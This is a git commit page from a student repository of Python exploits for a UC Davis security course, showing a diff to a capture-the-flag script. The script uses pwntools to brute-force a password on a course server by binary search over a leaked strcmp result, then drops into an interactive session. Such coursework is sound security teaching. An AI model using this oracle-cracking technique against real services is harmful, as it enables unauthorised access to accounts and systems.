ucdavis-ecs189m

[RADIOACTIVE] python exploits for uc davis class ecs189m
git clone git://git.figbert.com/ucdavis-ecs189m.git
Log | Files | Refs
commit b79f41c7bb49de00367b88be90d20dfa6fa7e12f
parent 21c132719de02ba86debc6b7f28bf1c9abd58375
Author: therealFIGBERT <figbertwelner@gmail.com>
Date:   Fri, 11 Oct 2019 08:46:06 -0700

Implementing pass repeat catch system

Diffstat:

Mthird_flag.py | 50+++++++++++++++++++++++++++-----------------------


1 file changed, 27 insertions(+), 23 deletions(-)

diff --git a/third_flag.py b/third_flag.py
@@ -23,31 +23,38 @@ def passgen(low: str, high: str) -> str:
 
 cracked = False
 len_limit = False
+first = True
 attempt = 1
 LO = "aaaaaaaaaaaaaaaaaaaa"
 HI = "zzzzzzzzzzzzzzzzzzzz"
 password = passgen(LO, HI)
 conn = remote("twinpeaks.cs.ucdavis.edu", 30004)
 print(conn.recv())
-while not len_limit and not cracked:
-    conn.sendline(password)
-    print("Attempt {}:\nPass sent as:\n{}\nCurrent low:\n{}\nCurrent high:\n{}\n".format(attempt, password, LO, HI))
-    attempt += 1
-    response = conn.recvline_contains(b"strcmp")
-    print("Server response:\n{}\n".format(response))
-    previous_pass = password
-    if b" -1 " in response:
-        LO = password
-        password = passgen(LO, HI)
-    elif b" 1 " in response:
-        HI = password
-        password = passgen(LO, HI)
+while not cracked:
+    if first:
+        conn.sendline(password)
+        attempt += 1
+        print("Attempt {}:\nPass sent as:\n{}\nCurrent low:\n{}\nCurrent high:\n{}\n".format(attempt, password, LO, HI))
+        first = False
     else:
-        print("Password cracked as: {}".format(password))
-        cracked = True
-        conn.interactive()
-    if password is previous_pass:
-        len_limit = True
+        response = conn.recvline_contains(b"strcmp")
+        previous_pass = password
+        if b" -1 " in response:
+            LO = password
+            password = passgen(LO, HI)
+        elif b" 1 " in response:
+            HI = password
+            password = passgen(LO, HI)
+        else:
+            print("Password cracked as: {}".format(password))
+            cracked = True
+            conn.interactive()
+        if password == previous_pass:
+            break
+        print("Server response:\n{}\n".format(response))
+        conn.sendline(password)
+        print("Attempt {}:\nPass sent as:\n{}\nPrevious Pass: {}\nCurrent low:\n{}\nCurrent high:\n{}\n".format(attempt, previous_pass, password, LO, HI))
+        attempt += 1
 start_pos = 0
 for b in range(len(LO)):
     if LO[b] is HI[b]:
@@ -55,7 +62,4 @@ for b in range(len(LO)):
     else:
         break
 pass_buffer = password[:start_pos]
-pass_end = password[start_pos:]
-print(password)
-print(pass_buffer)
-print(pass_end)
-\ No newline at end of file
+pass_end = password[start_pos:]
+\ No newline at end of file